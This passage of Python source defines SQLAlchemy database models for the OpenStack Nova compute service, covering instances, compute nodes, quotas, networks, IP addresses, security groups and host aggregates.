def save(self, session=None):
from nova.db.sqlalchemy import api
if session is None:
session = api.get_session()
super(NovaBase, self).save(session=session)
class Service(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a running service on a host."""
__tablename__ = 'services'
__table_args__ = (
schema.UniqueConstraint("host", "topic", "deleted",
name="uniq_services0host0topic0deleted"),
schema.UniqueConstraint("host", "binary", "deleted",
name="uniq_services0host0binary0deleted")
)
id = Column(Integer, primary_key=True)
host = Column(String(255)) # , ForeignKey('hosts.id'))
binary = Column(String(255))
topic = Column(String(255))
report_count = Column(Integer, nullable=False, default=0)
disabled = Column(Boolean, default=False)
disabled_reason = Column(String(255))
last_seen_up = Column(DateTime, nullable=True)
forced_down = Column(Boolean, default=False)
version = Column(Integer, default=0)
instance = orm.relationship(
"Instance",
backref='services',
primaryjoin='and_(Service.host == Instance.host,'
'Service.binary == "nova-compute",'
'Instance.deleted == 0)',
foreign_keys=host,
)
class ComputeNode(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a running compute service on a host."""
__tablename__ = 'compute_nodes'
__table_args__ = (
schema.UniqueConstraint(
'host', 'hypervisor_hostname', 'deleted',
name="uniq_compute_nodes0host0hypervisor_hostname0deleted"),
)
id = Column(Integer, primary_key=True)
service_id = Column(Integer, nullable=True)
# FIXME(sbauza): Host field is nullable because some old Juno compute nodes
# can still report stats from an old ResourceTracker without setting this
# field.
# This field has to be set non-nullable in a later cycle (probably Lxxx)
# once we are sure that all compute nodes in production report it.
host = Column(String(255), nullable=True)
vcpus = Column(Integer, nullable=False)
memory_mb = Column(Integer, nullable=False)
local_gb = Column(Integer, nullable=False)
vcpus_used = Column(Integer, nullable=False)
memory_mb_used = Column(Integer, nullable=False)
local_gb_used = Column(Integer, nullable=False)
hypervisor_type = Column(MediumText(), nullable=False)
hypervisor_version = Column(Integer, nullable=False)
hypervisor_hostname = Column(String(255))
# Free Ram, amount of activity (resize, migration, boot, etc) and
# the number of running VM's are a good starting point for what's
# important when making scheduling decisions.
free_ram_mb = Column(Integer)
free_disk_gb = Column(Integer)
current_workload = Column(Integer)
running_vms = Column(Integer)
# Note(masumotok): Expected Strings example:
#
# '{"arch":"x86_64",
# "model":"Nehalem",
# "topology":{"sockets":1, "threads":2, "cores":3},
# "features":["tdtscp", "xtpr"]}'
#
# Points are "json translatable" and it must have all dictionary keys
# above, since it is copied from <cpu> tag of getCapabilities()
# (See libvirt.virtConnection).
cpu_info = Column(MediumText(), nullable=False)
disk_available_least = Column(Integer)
host_ip = Column(types.IPAddress())
supported_instances = Column(Text)
metrics = Column(Text)
# Note(yongli): json string PCI Stats
# '[{"vendor_id":"8086", "product_id":"1234", "count":3 }, ...]'
pci_stats = Column(Text)
# extra_resources is a json string containing arbitrary
# data about additional resources.
extra_resources = Column(Text)
# json-encode string containing compute node statistics
stats = Column(Text, default='{}')
# json-encoded dict that contains NUMA topology as generated by
# objects.NUMATopology._to_json()
numa_topology = Column(Text)
# allocation ratios provided by the RT
ram_allocation_ratio = Column(Float, nullable=True)
cpu_allocation_ratio = Column(Float, nullable=True)
class Certificate(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a x509 certificate."""
__tablename__ = 'certificates'
__table_args__ = (
Index('certificates_project_id_deleted_idx', 'project_id', 'deleted'),
Index('certificates_user_id_deleted_idx', 'user_id', 'deleted')
)
id = Column(Integer, primary_key=True)
user_id = Column(String(255))
project_id = Column(String(255))
file_name = Column(String(255))
class Instance(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a guest VM."""
__tablename__ = 'instances'
__table_args__ = (
Index('uuid', 'uuid', unique=True),
Index('instances_project_id_deleted_idx',
'project_id', 'deleted'),
Index('instances_reservation_id_idx',
'reservation_id'),
Index('instances_terminated_at_launched_at_idx',
'terminated_at', 'launched_at'),
Index('instances_uuid_deleted_idx',
'uuid', 'deleted'),
Index('instances_task_state_updated_at_idx',
'task_state', 'updated_at'),
Index('instances_host_node_deleted_idx',
'host', 'node', 'deleted'),
Index('instances_host_deleted_cleaned_idx',
'host', 'deleted', 'cleaned'),
schema.UniqueConstraint('uuid', name='uniq_instances0uuid'),
)
injected_files = []
id = Column(Integer, primary_key=True, autoincrement=True)
@property
def name(self):
try:
base_name = CONF.instance_name_template % self.id
except TypeError:
# Support templates like "uuid-%(uuid)s", etc.
info = {}
# NOTE(russellb): Don't use self.iteritems() here, as it will
# result in infinite recursion on the name property.
for column in iter(orm.object_mapper(self).columns):
key = column.name
# prevent recursion if someone specifies %(name)s
# %(name)s will not be valid.
if key == 'name':
continue
info[key] = self[key]
try:
base_name = CONF.instance_name_template % info
except KeyError:
base_name = self.uuid
return base_name
@property
def _extra_keys(self):
return ['name']
user_id = Column(String(255))
project_id = Column(String(255))
image_ref = Column(String(255))
kernel_id = Column(String(255))
ramdisk_id = Column(String(255))
hostname = Column(String(255))
launch_index = Column(Integer)
key_name = Column(String(255))
key_data = Column(MediumText())
power_state = Column(Integer)
vm_state = Column(String(255))
task_state = Column(String(255))
memory_mb = Column(Integer)
vcpus = Column(Integer)
root_gb = Column(Integer)
ephemeral_gb = Column(Integer)
ephemeral_key_uuid = Column(String(36))
# This is not related to hostname, above. It refers
# to the nova node.
host = Column(String(255)) # , ForeignKey('hosts.id'))
# To identify the "ComputeNode" which the instance resides in.
# This equals to ComputeNode.hypervisor_hostname.
node = Column(String(255))
# *not* flavorid, this is the internal primary_key
instance_type_id = Column(Integer)
user_data = Column(MediumText())
reservation_id = Column(String(255))
# NOTE(sbiswas7): 'scheduled_at' is still in the database
# and can be removed in the future release.
launched_at = Column(DateTime)
terminated_at = Column(DateTime)
# This always refers to the availability_zone kwarg passed in /servers and
# provided as an API option, not at all related to the host AZ the instance
# belongs to.
availability_zone = Column(String(255))
# User editable field for display in user-facing UIs
display_name = Column(String(255))
display_description = Column(String(255))
# To remember on which host an instance booted.
# An instance may have moved to another host by live migration.
launched_on = Column(MediumText())
# NOTE(jdillaman): locked deprecated in favor of locked_by,
# to be removed in Icehouse
locked = Column(Boolean)
locked_by = Column(Enum('owner', 'admin'))
os_type = Column(String(255))
architecture = Column(String(255))
vm_mode = Column(String(255))
uuid = Column(String(36), nullable=False)
root_device_name = Column(String(255))
default_ephemeral_device = Column(String(255))
default_swap_device = Column(String(255))
config_drive = Column(String(255))
# User editable field meant to represent what ip should be used
# to connect to the instance
access_ip_v4 = Column(types.IPAddress())
access_ip_v6 = Column(types.IPAddress())
auto_disk_config = Column(Boolean())
progress = Column(Integer)
# EC2 instance_initiated_shutdown_terminate
# True: -> 'terminate'
# False: -> 'stop'
# Note(maoy): currently Nova will always stop instead of terminate
# no matter what the flag says. So we set the default to False.
shutdown_terminate = Column(Boolean(), default=False)
# EC2 disable_api_termination
disable_terminate = Column(Boolean(), default=False)
# OpenStack compute cell name. This will only be set at the top of
# the cells tree and it'll be a full cell name such as 'api!hop1!hop2'
cell_name = Column(String(255))
internal_id = Column(Integer)
# Records whether an instance has been deleted from disk
cleaned = Column(Integer, default=0)
class InstanceInfoCache(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a cache of information about an instance
"""
__tablename__ = 'instance_info_caches'
__table_args__ = (
schema.UniqueConstraint(
"instance_uuid",
name="uniq_instance_info_caches0instance_uuid"),)
id = Column(Integer, primary_key=True, autoincrement=True)
# text column used for storing a json object of network data for api
network_info = Column(MediumText())
instance_uuid = Column(String(36), ForeignKey('instances.uuid'),
nullable=False)
instance = orm.relationship(Instance,
backref=orm.backref('info_cache', uselist=False),
foreign_keys=instance_uuid,
primaryjoin=instance_uuid == Instance.uuid)
class InstanceExtra(BASE, NovaBase, models.SoftDeleteMixin):
__tablename__ = 'instance_extra'
__table_args__ = (
Index('instance_extra_idx', 'instance_uuid'),)
id = Column(Integer, primary_key=True, autoincrement=True)
instance_uuid = Column(String(36), ForeignKey('instances.uuid'),
nullable=False)
numa_topology = orm.deferred(Column(Text))
pci_requests = orm.deferred(Column(Text))
flavor = orm.deferred(Column(Text))
vcpu_model = orm.deferred(Column(Text))
migration_context = orm.deferred(Column(Text))
instance = orm.relationship(Instance,
backref=orm.backref('extra',
uselist=False),
foreign_keys=instance_uuid,
primaryjoin=instance_uuid == Instance.uuid)
class InstanceTypes(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents possible flavors for instances.
Note: instance_type and flavor are synonyms and the term instance_type is
deprecated and in the process of being removed.
"""
__tablename__ = "instance_types"
__table_args__ = (
schema.UniqueConstraint("flavorid", "deleted",
name="uniq_instance_types0flavorid0deleted"),
schema.UniqueConstraint("name", "deleted",
name="uniq_instance_types0name0deleted")
)
# Internal only primary key/id
id = Column(Integer, primary_key=True)
name = Column(String(255))
memory_mb = Column(Integer, nullable=False)
vcpus = Column(Integer, nullable=False)
root_gb = Column(Integer)
ephemeral_gb = Column(Integer)
# Public facing id will be renamed public_id
flavorid = Column(String(255))
swap = Column(Integer, nullable=False, default=0)
rxtx_factor = Column(Float, default=1)
vcpu_weight = Column(Integer)
disabled = Column(Boolean, default=False)
is_public = Column(Boolean, default=True)
class Quota(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a single quota override for a project.
If there is no row for a given project id and resource, then the
default for the quota class is used. If there is no row for a
given quota class and resource, then the default for the
deployment is used. If the row is present but the hard limit is
Null, then the resource is unlimited.
"""
__tablename__ = 'quotas'
__table_args__ = (
schema.UniqueConstraint("project_id", "resource", "deleted",
name="uniq_quotas0project_id0resource0deleted"
),
)
id = Column(Integer, primary_key=True)
project_id = Column(String(255))
resource = Column(String(255), nullable=False)
hard_limit = Column(Integer)
class ProjectUserQuota(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a single quota override for a user with in a project."""
__tablename__ = 'project_user_quotas'
uniq_name = "uniq_project_user_quotas0user_id0project_id0resource0deleted"
__table_args__ = (
schema.UniqueConstraint("user_id", "project_id", "resource", "deleted",
name=uniq_name),
Index('project_user_quotas_project_id_deleted_idx',
'project_id', 'deleted'),
Index('project_user_quotas_user_id_deleted_idx',
'user_id', 'deleted')
)
id = Column(Integer, primary_key=True, nullable=False)
project_id = Column(String(255), nullable=False)
user_id = Column(String(255), nullable=False)
resource = Column(String(255), nullable=False)
hard_limit = Column(Integer)
class QuotaClass(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a single quota override for a quota class.
If there is no row for a given quota class and resource, then the
default for the deployment is used. If the row is present but the
hard limit is Null, then the resource is unlimited.
"""
__tablename__ = 'quota_classes'
__table_args__ = (
Index('ix_quota_classes_class_name', 'class_name'),
)
id = Column(Integer, primary_key=True)
class_name = Column(String(255))
resource = Column(String(255))
hard_limit = Column(Integer)
class QuotaUsage(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents the current usage for a given resource."""
__tablename__ = 'quota_usages'
__table_args__ = (
Index('ix_quota_usages_project_id', 'project_id'),
Index('ix_quota_usages_user_id_deleted', 'user_id', 'deleted'),
)
id = Column(Integer, primary_key=True)
project_id = Column(String(255))
user_id = Column(String(255))
resource = Column(String(255), nullable=False)
in_use = Column(Integer, nullable=False)
reserved = Column(Integer, nullable=False)
@property
def total(self):
return self.in_use + self.reserved
until_refresh = Column(Integer)
class Reservation(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a resource reservation for quotas."""
__tablename__ = 'reservations'
__table_args__ = (
Index('ix_reservations_project_id', 'project_id'),
Index('reservations_uuid_idx', 'uuid'),
Index('reservations_deleted_expire_idx', 'deleted', 'expire'),
Index('ix_reservations_user_id_deleted', 'user_id', 'deleted'),
)
id = Column(Integer, primary_key=True, nullable=False)
uuid = Column(String(36), nullable=False)
usage_id = Column(Integer, ForeignKey('quota_usages.id'), nullable=False)
project_id = Column(String(255))
user_id = Column(String(255))
resource = Column(String(255))
delta = Column(Integer, nullable=False)
expire = Column(DateTime)
usage = orm.relationship(
"QuotaUsage",
foreign_keys=usage_id,
primaryjoin='and_(Reservation.usage_id == QuotaUsage.id,'
'QuotaUsage.deleted == 0)')
class Snapshot(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a block storage device that can be attached to a VM."""
__tablename__ = 'snapshots'
__table_args__ = ()
id = Column(String(36), primary_key=True, nullable=False)
deleted = Column(String(36), default="")
@property
def name(self):
return CONF.snapshot_name_template % self.id
@property
def volume_name(self):
return CONF.volume_name_template % self.volume_id
user_id = Column(String(255))
project_id = Column(String(255))
volume_id = Column(String(36), nullable=False)
status = Column(String(255))
progress = Column(String(255))
volume_size = Column(Integer)
scheduled_at = Column(DateTime)
display_name = Column(String(255))
display_description = Column(String(255))
class BlockDeviceMapping(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents block device mapping that is defined by EC2."""
__tablename__ = "block_device_mapping"
__table_args__ = (
Index('snapshot_id', 'snapshot_id'),
Index('volume_id', 'volume_id'),
Index('block_device_mapping_instance_uuid_device_name_idx',
'instance_uuid', 'device_name'),
Index('block_device_mapping_instance_uuid_volume_id_idx',
'instance_uuid', 'volume_id'),
Index('block_device_mapping_instance_uuid_idx', 'instance_uuid'),
)
id = Column(Integer, primary_key=True, autoincrement=True)
instance_uuid = Column(String(36), ForeignKey('instances.uuid'))
instance = orm.relationship(Instance,
backref=orm.backref('block_device_mapping'),
foreign_keys=instance_uuid,
primaryjoin='and_(BlockDeviceMapping.'
'instance_uuid=='
'Instance.uuid,'
'BlockDeviceMapping.deleted=='
'0)')
source_type = Column(String(255))
destination_type = Column(String(255))
guest_format = Column(String(255))
device_type = Column(String(255))
disk_bus = Column(String(255))
boot_index = Column(Integer)
device_name = Column(String(255))
# default=False for compatibility of the existing code.
# With EC2 API,
# default True for ami specified device.
# default False for created with other timing.
# TODO(sshturm) add default in db
delete_on_termination = Column(Boolean, default=False)
snapshot_id = Column(String(36))
volume_id = Column(String(36))
volume_size = Column(Integer)
image_id = Column(String(36))
# for no device to suppress devices.
no_device = Column(Boolean)
connection_info = Column(MediumText())
class SecurityGroupInstanceAssociation(BASE, NovaBase, models.SoftDeleteMixin):
__tablename__ = 'security_group_instance_association'
__table_args__ = (
Index('security_group_instance_association_instance_uuid_idx',
'instance_uuid'),
)
id = Column(Integer, primary_key=True, nullable=False)
security_group_id = Column(Integer, ForeignKey('security_groups.id'))
instance_uuid = Column(String(36), ForeignKey('instances.uuid'))
class SecurityGroup(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a security group."""
__tablename__ = 'security_groups'
__table_args__ = (
schema.UniqueConstraint('project_id', 'name', 'deleted',
name='uniq_security_groups0project_id0'
'name0deleted'),
)
id = Column(Integer, primary_key=True)
name = Column(String(255))
description = Column(String(255))
user_id = Column(String(255))
project_id = Column(String(255))
instances = orm.relationship(Instance,
secondary="security_group_instance_association",
primaryjoin='and_('
'SecurityGroup.id == '
'SecurityGroupInstanceAssociation.security_group_id,'
'SecurityGroupInstanceAssociation.deleted == 0,'
'SecurityGroup.deleted == 0)',
secondaryjoin='and_('
'SecurityGroupInstanceAssociation.instance_uuid == Instance.uuid,'
# (anthony) the condition below shouldn't be necessary now that the
# association is being marked as deleted. However, removing this
# may cause existing deployments to choke, so I'm leaving it
'Instance.deleted == 0)',
backref='security_groups')
class SecurityGroupIngressRule(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a rule in a security group."""
__tablename__ = 'security_group_rules'
__table_args__ = ()
id = Column(Integer, primary_key=True)
parent_group_id = Column(Integer, ForeignKey('security_groups.id'))
parent_group = orm.relationship("SecurityGroup", backref="rules",
foreign_keys=parent_group_id,
primaryjoin='and_('
'SecurityGroupIngressRule.parent_group_id == SecurityGroup.id,'
'SecurityGroupIngressRule.deleted == 0)')
protocol = Column(String(255))
from_port = Column(Integer)
to_port = Column(Integer)
cidr = Column(types.CIDR())
    # Note: This is not the parent SecurityGroup. It is the SecurityGroup
    # that we are granting access to.
group_id = Column(Integer, ForeignKey('security_groups.id'))
grantee_group = orm.relationship("SecurityGroup",
foreign_keys=group_id,
primaryjoin='and_('
'SecurityGroupIngressRule.group_id == SecurityGroup.id,'
'SecurityGroupIngressRule.deleted == 0)')
class SecurityGroupIngressDefaultRule(BASE, NovaBase, models.SoftDeleteMixin):
__tablename__ = 'security_group_default_rules'
__table_args__ = ()
id = Column(Integer, primary_key=True, nullable=False)
protocol = Column(String(5)) # "tcp", "udp" or "icmp"
from_port = Column(Integer)
to_port = Column(Integer)
cidr = Column(types.CIDR())
class ProviderFirewallRule(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a rule in a security group."""
__tablename__ = 'provider_fw_rules'
__table_args__ = ()
id = Column(Integer, primary_key=True, nullable=False)
protocol = Column(String(5)) # "tcp", "udp", or "icmp"
from_port = Column(Integer)
to_port = Column(Integer)
cidr = Column(types.CIDR())
class KeyPair(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a public key pair for ssh / WinRM."""
__tablename__ = 'key_pairs'
__table_args__ = (
schema.UniqueConstraint("user_id", "name", "deleted",
name="uniq_key_pairs0user_id0name0deleted"),
)
id = Column(Integer, primary_key=True, nullable=False)
name = Column(String(255), nullable=False)
user_id = Column(String(255))
fingerprint = Column(String(255))
public_key = Column(MediumText())
type = Column(Enum('ssh', 'x509', name='keypair_types'),
nullable=False, server_default='ssh')
class Migration(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a running host-to-host migration."""
__tablename__ = 'migrations'
__table_args__ = (
Index('migrations_instance_uuid_and_status_idx', 'deleted',
'instance_uuid', 'status'),
Index('migrations_by_host_nodes_and_status_idx', 'deleted',
'source_compute', 'dest_compute', 'source_node', 'dest_node',
'status'),
)
id = Column(Integer, primary_key=True, nullable=False)
# NOTE(tr3buchet): the ____compute variables are instance['host']
source_compute = Column(String(255))
dest_compute = Column(String(255))
# nodes are equivalent to a compute node's 'hypervisor_hostname'
source_node = Column(String(255))
dest_node = Column(String(255))
# NOTE(tr3buchet): dest_host, btw, is an ip address
dest_host = Column(String(255))
old_instance_type_id = Column(Integer())
new_instance_type_id = Column(Integer())
instance_uuid = Column(String(36), ForeignKey('instances.uuid'))
# TODO(_cerberus_): enum
status = Column(String(255))
migration_type = Column(Enum('migration', 'resize', 'live-migration',
'evacuation'),
nullable=True)
hidden = Column(Boolean, default=False)
instance = orm.relationship("Instance", foreign_keys=instance_uuid,
primaryjoin='and_(Migration.instance_uuid == '
'Instance.uuid, Instance.deleted == '
'0)')
class Network(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a network."""
__tablename__ = 'networks'
__table_args__ = (
schema.UniqueConstraint("vlan", "deleted",
name="uniq_networks0vlan0deleted"),
Index('networks_bridge_deleted_idx', 'bridge', 'deleted'),
Index('networks_host_idx', 'host'),
Index('networks_project_id_deleted_idx', 'project_id', 'deleted'),
Index('networks_uuid_project_id_deleted_idx', 'uuid',
'project_id', 'deleted'),
Index('networks_vlan_deleted_idx', 'vlan', 'deleted'),
Index('networks_cidr_v6_idx', 'cidr_v6')
)
id = Column(Integer, primary_key=True, nullable=False)
label = Column(String(255))
injected = Column(Boolean, default=False)
cidr = Column(types.CIDR())
cidr_v6 = Column(types.CIDR())
multi_host = Column(Boolean, default=False)
gateway_v6 = Column(types.IPAddress())
netmask_v6 = Column(types.IPAddress())
netmask = Column(types.IPAddress())
bridge = Column(String(255))
bridge_interface = Column(String(255))
gateway = Column(types.IPAddress())
broadcast = Column(types.IPAddress())
dns1 = Column(types.IPAddress())
dns2 = Column(types.IPAddress())
vlan = Column(Integer)
vpn_public_address = Column(types.IPAddress())
vpn_public_port = Column(Integer)
vpn_private_address = Column(types.IPAddress())
dhcp_start = Column(types.IPAddress())
rxtx_base = Column(Integer)
project_id = Column(String(255))
priority = Column(Integer)
host = Column(String(255)) # , ForeignKey('hosts.id'))
uuid = Column(String(36))
mtu = Column(Integer)
dhcp_server = Column(types.IPAddress())
enable_dhcp = Column(Boolean, default=True)
share_address = Column(Boolean, default=False)
class VirtualInterface(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a virtual interface on an instance."""
__tablename__ = 'virtual_interfaces'
__table_args__ = (
schema.UniqueConstraint("address", "deleted",
name="uniq_virtual_interfaces0address0deleted"),
Index('virtual_interfaces_network_id_idx', 'network_id'),
Index('virtual_interfaces_instance_uuid_fkey', 'instance_uuid'),
Index('virtual_interfaces_uuid_idx', 'uuid'),
)
id = Column(Integer, primary_key=True, nullable=False)
address = Column(String(255))
network_id = Column(Integer)
instance_uuid = Column(String(36), ForeignKey('instances.uuid'))
uuid = Column(String(36))
# TODO(vish): can these both come from the same baseclass?
class FixedIp(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a fixed IP for an instance."""
__tablename__ = 'fixed_ips'
__table_args__ = (
schema.UniqueConstraint(
"address", "deleted", name="uniq_fixed_ips0address0deleted"),
Index('fixed_ips_virtual_interface_id_fkey', 'virtual_interface_id'),
Index('network_id', 'network_id'),
Index('address', 'address'),
Index('fixed_ips_instance_uuid_fkey', 'instance_uuid'),
Index('fixed_ips_host_idx', 'host'),
Index('fixed_ips_network_id_host_deleted_idx', 'network_id', 'host',
'deleted'),
Index('fixed_ips_address_reserved_network_id_deleted_idx',
'address', 'reserved', 'network_id', 'deleted'),
Index('fixed_ips_deleted_allocated_idx', 'address', 'deleted',
'allocated'),
Index('fixed_ips_deleted_allocated_updated_at_idx', 'deleted',
'allocated', 'updated_at')
)
id = Column(Integer, primary_key=True)
address = Column(types.IPAddress())
network_id = Column(Integer)
virtual_interface_id = Column(Integer)
instance_uuid = Column(String(36), ForeignKey('instances.uuid'))
    # associated means that a fixed_ip has its instance_uuid column set
    # allocated means that a fixed_ip has its virtual_interface_id column set
# TODO(sshturm) add default in db
allocated = Column(Boolean, default=False)
# leased means dhcp bridge has leased the ip
# TODO(sshturm) add default in db
leased = Column(Boolean, default=False)
# TODO(sshturm) add default in db
reserved = Column(Boolean, default=False)
host = Column(String(255))
network = orm.relationship(Network,
backref=orm.backref('fixed_ips'),
foreign_keys=network_id,
primaryjoin='and_('
'FixedIp.network_id == Network.id,'
'FixedIp.deleted == 0,'
'Network.deleted == 0)')
instance = orm.relationship(Instance,
foreign_keys=instance_uuid,
primaryjoin='and_('
'FixedIp.instance_uuid == Instance.uuid,'
'FixedIp.deleted == 0,'
'Instance.deleted == 0)')
virtual_interface = orm.relationship(VirtualInterface,
backref=orm.backref('fixed_ips'),
foreign_keys=virtual_interface_id,
primaryjoin='and_('
'FixedIp.virtual_interface_id == '
'VirtualInterface.id,'
'FixedIp.deleted == 0,'
'VirtualInterface.deleted == 0)')
class FloatingIp(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a floating IP that dynamically forwards to a fixed IP."""
__tablename__ = 'floating_ips'
__table_args__ = (
schema.UniqueConstraint("address", "deleted",
name="uniq_floating_ips0address0deleted"),
Index('fixed_ip_id', 'fixed_ip_id'),
Index('floating_ips_host_idx', 'host'),
Index('floating_ips_project_id_idx', 'project_id'),
Index('floating_ips_pool_deleted_fixed_ip_id_project_id_idx',
'pool', 'deleted', 'fixed_ip_id', 'project_id')
)
id = Column(Integer, primary_key=True)
address = Column(types.IPAddress())
fixed_ip_id = Column(Integer)
project_id = Column(String(255))
host = Column(String(255)) # , ForeignKey('hosts.id'))
auto_assigned = Column(Boolean, default=False)
# TODO(sshturm) add default in db
pool = Column(String(255))
interface = Column(String(255))
fixed_ip = orm.relationship(FixedIp,
backref=orm.backref('floating_ips'),
foreign_keys=fixed_ip_id,
primaryjoin='and_('
'FloatingIp.fixed_ip_id == FixedIp.id,'
'FloatingIp.deleted == 0,'
'FixedIp.deleted == 0)')
class DNSDomain(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a DNS domain with availability zone or project info."""
__tablename__ = 'dns_domains'
__table_args__ = (
Index('dns_domains_project_id_idx', 'project_id'),
Index('dns_domains_domain_deleted_idx', 'domain', 'deleted'),
)
deleted = Column(Boolean, default=False)
domain = Column(String(255), primary_key=True)
scope = Column(String(255))
availability_zone = Column(String(255))
project_id = Column(String(255))
class ConsolePool(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents pool of consoles on the same physical node."""
__tablename__ = 'console_pools'
__table_args__ = (
schema.UniqueConstraint(
"host", "console_type", "compute_host", "deleted",
name="uniq_console_pools0host0console_type0compute_host0deleted"),
)
id = Column(Integer, primary_key=True)
address = Column(types.IPAddress())
username = Column(String(255))
password = Column(String(255))
console_type = Column(String(255))
public_hostname = Column(String(255))
host = Column(String(255))
compute_host = Column(String(255))
class Console(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a console session for an instance."""
__tablename__ = 'consoles'
__table_args__ = (
Index('consoles_instance_uuid_idx', 'instance_uuid'),
)
id = Column(Integer, primary_key=True)
instance_name = Column(String(255))
instance_uuid = Column(String(36), ForeignKey('instances.uuid'))
password = Column(String(255))
port = Column(Integer)
pool_id = Column(Integer, ForeignKey('console_pools.id'))
pool = orm.relationship(ConsolePool, backref=orm.backref('consoles'))
class InstanceMetadata(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a user-provided metadata key/value pair for an instance."""
__tablename__ = 'instance_metadata'
__table_args__ = (
Index('instance_metadata_instance_uuid_idx', 'instance_uuid'),
)
id = Column(Integer, primary_key=True)
key = Column(String(255))
value = Column(String(255))
instance_uuid = Column(String(36), ForeignKey('instances.uuid'))
instance = orm.relationship(Instance, backref="metadata",
foreign_keys=instance_uuid,
primaryjoin='and_('
'InstanceMetadata.instance_uuid == '
'Instance.uuid,'
'InstanceMetadata.deleted == 0)')
class InstanceSystemMetadata(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a system-owned metadata key/value pair for an instance."""
__tablename__ = 'instance_system_metadata'
__table_args__ = (
Index('instance_uuid', 'instance_uuid'),
)
id = Column(Integer, primary_key=True)
key = Column(String(255), nullable=False)
value = Column(String(255))
instance_uuid = Column(String(36),
ForeignKey('instances.uuid'),
nullable=False)
instance = orm.relationship(Instance, backref="system_metadata",
foreign_keys=instance_uuid)
class InstanceTypeProjects(BASE, NovaBase, models.SoftDeleteMixin):
"""Represent projects associated instance_types."""
__tablename__ = "instance_type_projects"
__table_args__ = (schema.UniqueConstraint(
"instance_type_id", "project_id", "deleted",
name="uniq_instance_type_projects0instance_type_id0project_id0deleted"
),
)
id = Column(Integer, primary_key=True)
instance_type_id = Column(Integer, ForeignKey('instance_types.id'),
nullable=False)
project_id = Column(String(255))
instance_type = orm.relationship(InstanceTypes, backref="projects",
foreign_keys=instance_type_id,
primaryjoin='and_('
'InstanceTypeProjects.instance_type_id == InstanceTypes.id,'
'InstanceTypeProjects.deleted == 0)')
class InstanceTypeExtraSpecs(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents additional specs as key/value pairs for an instance_type."""
__tablename__ = 'instance_type_extra_specs'
__table_args__ = (
Index('instance_type_extra_specs_instance_type_id_key_idx',
'instance_type_id', 'key'),
schema.UniqueConstraint(
"instance_type_id", "key", "deleted",
name=("uniq_instance_type_extra_specs0"
"instance_type_id0key0deleted")
),
{'mysql_collate': 'utf8_bin'},
)
id = Column(Integer, primary_key=True)
key = Column(String(255))
value = Column(String(255))
instance_type_id = Column(Integer, ForeignKey('instance_types.id'),
nullable=False)
instance_type = orm.relationship(InstanceTypes, backref="extra_specs",
foreign_keys=instance_type_id,
primaryjoin='and_('
'InstanceTypeExtraSpecs.instance_type_id == InstanceTypes.id,'
'InstanceTypeExtraSpecs.deleted == 0)')
class Cell(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents parent and child cells of this cell. Cells can
have multiple parents and children, so there could be any number
of entries with is_parent=True or False
"""
__tablename__ = 'cells'
__table_args__ = (schema.UniqueConstraint(
"name", "deleted", name="uniq_cells0name0deleted"
),
)
id = Column(Integer, primary_key=True)
# Name here is the 'short name' of a cell. For instance: 'child1'
name = Column(String(255))
api_url = Column(String(255))
transport_url = Column(String(255), nullable=False)
weight_offset = Column(Float(), default=0.0)
weight_scale = Column(Float(), default=1.0)
is_parent = Column(Boolean())
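# --- Illustrative sketch (not part of the original Nova models) ---
# Per the Cell docstring above, parent/child relationships are plain rows
# distinguished by is_parent; `session` is an assumed SQLAlchemy Session.
def _example_child_cells(session):
    # Child entries are the non-deleted rows flagged with is_parent=False
    # (deleted == 0 is the soft-delete convention used by these models).
    return session.query(Cell).filter_by(is_parent=False, deleted=0).all()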
class AggregateHost(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a host that is member of an aggregate."""
__tablename__ = 'aggregate_hosts'
__table_args__ = (schema.UniqueConstraint(
"host", "aggregate_id", "deleted",
name="uniq_aggregate_hosts0host0aggregate_id0deleted"
),
)
id = Column(Integer, primary_key=True, autoincrement=True)
host = Column(String(255))
aggregate_id = Column(Integer, ForeignKey('aggregates.id'), nullable=False)
class AggregateMetadata(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a metadata key/value pair for an aggregate."""
__tablename__ = 'aggregate_metadata'
__table_args__ = (
schema.UniqueConstraint("aggregate_id", "key", "deleted",
name="uniq_aggregate_metadata0aggregate_id0key0deleted"
),
Index('aggregate_metadata_key_idx', 'key'),
)
id = Column(Integer, primary_key=True)
key = Column(String(255), nullable=False)
value = Column(String(255), nullable=False)
aggregate_id = Column(Integer, ForeignKey('aggregates.id'), nullable=False)
class Aggregate(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a cluster of hosts that exists in this zone."""
__tablename__ = 'aggregates'
__table_args__ = ()
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String(255))
_hosts = orm.relationship(AggregateHost,
primaryjoin='and_('
'Aggregate.id == AggregateHost.aggregate_id,'
'AggregateHost.deleted == 0,'
'Aggregate.deleted == 0)')
_metadata = orm.relationship(AggregateMetadata,
primaryjoin='and_('
'Aggregate.id == AggregateMetadata.aggregate_id,'
'AggregateMetadata.deleted == 0,'
'Aggregate.deleted == 0)')
@property
def _extra_keys(self):
